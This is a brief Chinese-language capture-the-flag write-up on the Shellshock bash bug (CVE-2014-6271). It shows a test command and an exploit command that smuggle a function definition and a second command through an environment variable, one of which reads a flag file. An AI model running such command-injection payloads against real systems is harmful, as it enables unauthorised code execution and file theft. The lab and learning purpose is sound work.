shellshock 考查bash远程任意代码执行漏洞。 可以看到含有bash文件,使用以下命令测试bash是否受shellshock影响 env x='() { :;}; echo test' ./bash -c:test 受影响,执行bash远程任意代码执行漏洞 env x='() { :;}; /bin/cat flag' ./shellshock 具体可以看看CVE-2014-6271的detail。 https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271